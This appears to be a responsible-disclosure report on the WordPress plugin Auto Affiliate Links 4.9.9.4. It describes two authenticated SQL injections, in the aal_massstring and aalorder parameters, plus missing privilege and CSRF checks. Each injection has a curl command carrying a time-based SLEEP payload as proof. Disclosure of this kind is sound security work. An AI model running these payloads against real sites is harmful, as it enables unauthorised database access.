Hello,

Plugin: Auto Affiliate Links 4.9.9.4 https://wordpress.org/plugins/wp-auto-affiliate-links/

Authenticated users can execute arbitrary SQL commands.

1. SQL injection (wpaal_actions())

Method: POST

Url: http://localhost/wp-admin/admin.php

Vulnerable parameter: aal_massstring

Example PHP callstack:

wpaal_actions   [/wp-auto-affiliate-links/WP-auto-affiliate-links.php:136]

wpdb::query 

Please also note there is no privileges checking in wpaal_actions() so any authenticated user can perform actions from it (like deleting etc). 

Verification:

curl --cookie "..." --data "aal_massactionscheck=1&aal_massstring=1,(SELECT * FROM (SELECT SLEEP(5))X)" http://localhost/wp-admin/admin.php

2. SQL injection (AalLink::showAll()) 

This one is for authenticated administrators only (no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/admin.php?page=aal_topmenu

Vulnerable parameter: aalorder

Example PHP callstack:

wpaal_manage_affiliates   [/wp-auto-affiliate-links/WP-auto-affiliate-links.php:356]

showAll   [/wp-auto-affiliate-links/classes/link.php:29]

wpdb::get_results 

Verification:

curl --cookie "..." "http://localhost/wp-admin/admin.php?page=aal_topmenu&aalorder=1%2C%28SELECT+%2A+FROM+%28SELECT+SLEEP%285%29%29X%29"

3. Other security-related concerns:

In aalImportSettingsAction() function there is no CSRF protection so it's possible to replace settings with arbitrary file upload.